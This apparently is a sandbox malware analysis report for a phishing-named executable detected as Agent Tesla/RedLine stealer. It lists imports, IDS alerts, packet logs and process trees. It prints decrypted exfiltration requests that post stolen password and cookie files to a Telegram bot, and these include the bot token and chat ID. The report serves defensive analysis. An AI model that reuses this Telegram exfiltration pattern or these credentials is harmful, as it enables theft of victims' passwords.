USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/04/24-10:06:01.265819	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49710	443	192.168.2.8	149.154.167.220
05/04/24-10:05:51.470808	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49708	443	192.168.2.8	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 10:05:50.309094906 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:50.309156895 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:50.309216976 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:50.324529886 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:50.324543953 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:50.971235991 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:50.971323013 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:51.036652088 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:51.036689997 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:51.037007093 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:51.111085892 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:51.152127028 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:51.470669985 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:51.470721960 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:51.602797031 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:51.702994108 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:51.981568098 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:51.981707096 CEST	443	49708	149.154.167.220	192.168.2.8
May 4, 2024 10:05:51.981945992 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:51.988202095 CEST	49708	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:52.060303926 CEST	49709	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:52.060348034 CEST	443	49709	149.154.167.220	192.168.2.8
May 4, 2024 10:05:52.060444117 CEST	49709	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:52.060767889 CEST	49709	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:52.060781002 CEST	443	49709	149.154.167.220	192.168.2.8
May 4, 2024 10:05:52.690084934 CEST	443	49709	149.154.167.220	192.168.2.8
May 4, 2024 10:05:52.691803932 CEST	49709	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:52.691854000 CEST	443	49709	149.154.167.220	192.168.2.8
May 4, 2024 10:05:53.047032118 CEST	49709	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:53.047065973 CEST	443	49709	149.154.167.220	192.168.2.8
May 4, 2024 10:05:53.314100981 CEST	443	49709	149.154.167.220	192.168.2.8
May 4, 2024 10:05:53.359366894 CEST	49709	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:53.683958054 CEST	443	49709	149.154.167.220	192.168.2.8
May 4, 2024 10:05:53.684036970 CEST	443	49709	149.154.167.220	192.168.2.8
May 4, 2024 10:05:53.684216976 CEST	49709	443	192.168.2.8	149.154.167.220
May 4, 2024 10:05:54.561283112 CEST	49709	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:00.217624903 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:00.217675924 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:00.217745066 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:00.222666025 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:00.222687006 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:00.858644962 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:00.858726025 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:00.860258102 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:00.860269070 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:00.860495090 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:00.906131029 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:00.909344912 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:00.956110954 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:01.265697002 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:01.265738010 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:01.492243052 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:01.546782017 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:01.847899914 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:01.848021030 CEST	443	49710	149.154.167.220	192.168.2.8
May 4, 2024 10:06:01.848185062 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:01.851733923 CEST	49710	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:01.891994953 CEST	49711	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:01.892035961 CEST	443	49711	149.154.167.220	192.168.2.8
May 4, 2024 10:06:01.892121077 CEST	49711	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:01.892528057 CEST	49711	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:01.892537117 CEST	443	49711	149.154.167.220	192.168.2.8
May 4, 2024 10:06:02.533267975 CEST	443	49711	149.154.167.220	192.168.2.8
May 4, 2024 10:06:02.578011990 CEST	49711	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:02.983196974 CEST	49711	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:02.983222961 CEST	443	49711	149.154.167.220	192.168.2.8
May 4, 2024 10:06:03.299325943 CEST	443	49711	149.154.167.220	192.168.2.8
May 4, 2024 10:06:03.343612909 CEST	49711	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:03.353122950 CEST	49711	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:03.353157043 CEST	443	49711	149.154.167.220	192.168.2.8
May 4, 2024 10:06:03.734216928 CEST	443	49711	149.154.167.220	192.168.2.8
May 4, 2024 10:06:03.734302044 CEST	443	49711	149.154.167.220	192.168.2.8
May 4, 2024 10:06:03.734369993 CEST	49711	443	192.168.2.8	149.154.167.220
May 4, 2024 10:06:03.763032913 CEST	49711	443	192.168.2.8	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 10:05:47.374573946 CEST	49719	53	192.168.2.8	1.1.1.1
May 4, 2024 10:05:47.535377979 CEST	53	49719	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 4, 2024 10:05:47.374573946 CEST	192.168.2.8	1.1.1.1	0x1a0b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 4, 2024 10:05:47.535377979 CEST	1.1.1.1	192.168.2.8	0x1a0b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	149.154.167.220	443	1440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:05:51 UTC	260	OUT	POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc6c21c433b488 Host: api.telegram.org Content-Length: 918 Expect: 100-continue Connection: Keep-Alive
2024-05-04 08:05:51 UTC	918	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 63 32 31 63 34 33 33 62 34 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 32 35 35 32 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 63 32 31 63 34 33 33 62 34 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 34 2f 32 30 32 34 20 31 30 3a 30 35 3a 34 36 0a 55 73 65 72 Data Ascii: -----------------------------8dc6c21c433b488Content-Disposition: form-data; name="chat_id"7062552884-----------------------------8dc6c21c433b488Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/04/2024 10:05:46User
2024-05-04 08:05:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-04 08:05:51 UTC	1043	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 04 May 2024 08:05:51 GMT Content-Type: application/json Content-Length: 655 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":2134,"from":{"id":7166327996,"is_bot":true,"first_name":"Bami","username":"BamiSB_bot"},"chat":{"id":7062552884,"first_name":"Bami","last_name":"Bami","username":"bamibami1","type":"private"},"date":1714809951,"document":{"file_name":"user-878164 2024-05-04 10-05-46.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIIVmY17F8Y8Br_9ldE8tNlaDC-WKXeAALNEQACJYqxUUGd93y53KGcNAQ","file_unique_id":"AgADzREAAiWKsVE","file_size":320},"caption":"New PW Recovered!\n\nTime: 05/04/2024 10:05:46\nUser Name: user/878164\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49709	149.154.167.220	443	1440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:05:52 UTC	236	OUT	POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc6c21c7120916 Host: api.telegram.org Content-Length: 887 Expect: 100-continue
2024-05-04 08:05:53 UTC	887	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 63 32 31 63 37 31 32 30 39 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 32 35 35 32 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 63 32 31 63 37 31 32 30 39 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 34 2f 32 30 32 34 20 31 30 3a 30 35 3a 35 30 0a 55 73 65 72 Data Ascii: -----------------------------8dc6c21c7120916Content-Disposition: form-data; name="chat_id"7062552884-----------------------------8dc6c21c7120916Content-Disposition: form-data; name="caption"New CO Recovered!Time: 05/04/2024 10:05:50User
2024-05-04 08:05:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-04 08:05:53 UTC	1043	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 04 May 2024 08:05:53 GMT Content-Type: application/json Content-Length: 655 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":2135,"from":{"id":7166327996,"is_bot":true,"first_name":"Bami","username":"BamiSB_bot"},"chat":{"id":7062552884,"first_name":"Bami","last_name":"Bami","username":"bamibami1","type":"private"},"date":1714809953,"document":{"file_name":"user-878164 2024-05-04 10-05-50.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIIV2Y17GHkBnWZ2kYcH_fJfk7FO7HxAALOEQACJYqxUeODOTerpWs-NAQ","file_unique_id":"AgADzhEAAiWKsVE","file_size":289},"caption":"New CO Recovered!\n\nTime: 05/04/2024 10:05:50\nUser Name: user/878164\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49710	149.154.167.220	443	4864	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:06:00 UTC	260	OUT	POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc6c21cbde34e4 Host: api.telegram.org Content-Length: 918 Expect: 100-continue Connection: Keep-Alive
2024-05-04 08:06:01 UTC	918	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 63 32 31 63 62 64 65 33 34 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 32 35 35 32 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 63 32 31 63 62 64 65 33 34 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 34 2f 32 30 32 34 20 31 30 3a 30 35 3a 35 38 0a 55 73 65 72 Data Ascii: -----------------------------8dc6c21cbde34e4Content-Disposition: form-data; name="chat_id"7062552884-----------------------------8dc6c21cbde34e4Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/04/2024 10:05:58User
2024-05-04 08:06:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-04 08:06:01 UTC	1043	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 04 May 2024 08:06:01 GMT Content-Type: application/json Content-Length: 655 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":2136,"from":{"id":7166327996,"is_bot":true,"first_name":"Bami","username":"BamiSB_bot"},"chat":{"id":7062552884,"first_name":"Bami","last_name":"Bami","username":"bamibami1","type":"private"},"date":1714809961,"document":{"file_name":"user-878164 2024-05-04 10-05-58.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIIWGY17GmCZ53Cvym_ogKV9A6aapkhAALPEQACJYqxUWjgsk2iZEpVNAQ","file_unique_id":"AgADzxEAAiWKsVE","file_size":320},"caption":"New PW Recovered!\n\nTime: 05/04/2024 10:05:58\nUser Name: user/878164\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49711	149.154.167.220	443	4864	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:06:02 UTC	236	OUT	POST /bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dc6c21ccf06265 Host: api.telegram.org Content-Length: 887 Expect: 100-continue
2024-05-04 08:06:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-04 08:06:03 UTC	887	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 63 32 31 63 63 66 30 36 32 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 32 35 35 32 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 63 32 31 63 63 66 30 36 32 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 34 2f 32 30 32 34 20 31 30 3a 30 36 3a 30 30 0a 55 73 65 72 Data Ascii: -----------------------------8dc6c21ccf06265Content-Disposition: form-data; name="chat_id"7062552884-----------------------------8dc6c21ccf06265Content-Disposition: form-data; name="caption"New CO Recovered!Time: 05/04/2024 10:06:00User
2024-05-04 08:06:03 UTC	1043	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 04 May 2024 08:06:03 GMT Content-Type: application/json Content-Length: 655 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":2137,"from":{"id":7166327996,"is_bot":true,"first_name":"Bami","username":"BamiSB_bot"},"chat":{"id":7062552884,"first_name":"Bami","last_name":"Bami","username":"bamibami1","type":"private"},"date":1714809963,"document":{"file_name":"user-878164 2024-05-04 10-06-00.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIIWWY17GtFnPm8cC-EP2j-iJV9-9kFAALQEQACJYqxUYgwtoKNlKxjNAQ","file_unique_id":"AgAD0BEAAiWKsVE","file_size":289},"caption":"New CO Recovered!\n\nTime: 05/04/2024 10:06:00\nUser Name: user/878164\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Target ID:	0
Start time:	10:02:26
Start date:	04/05/2024
Path:	C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Imagebase:	0xbb0000
File size:	1'172'480 bytes
MD5 hash:	AC5DF4D0010A0D3B07047C48EAB42A3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:05:40
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Imagebase:	0x9c0000
File size:	116'515'840 bytes
MD5 hash:	2AE322D5CE2B39574F35D1EEE4788A83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:05:41
Start date:	04/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe"
Imagebase:	0x430000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:05:41
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x9c0000
File size:	116'515'840 bytes
MD5 hash:	2AE322D5CE2B39574F35D1EEE4788A83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:05:43
Start date:	04/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x8a0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
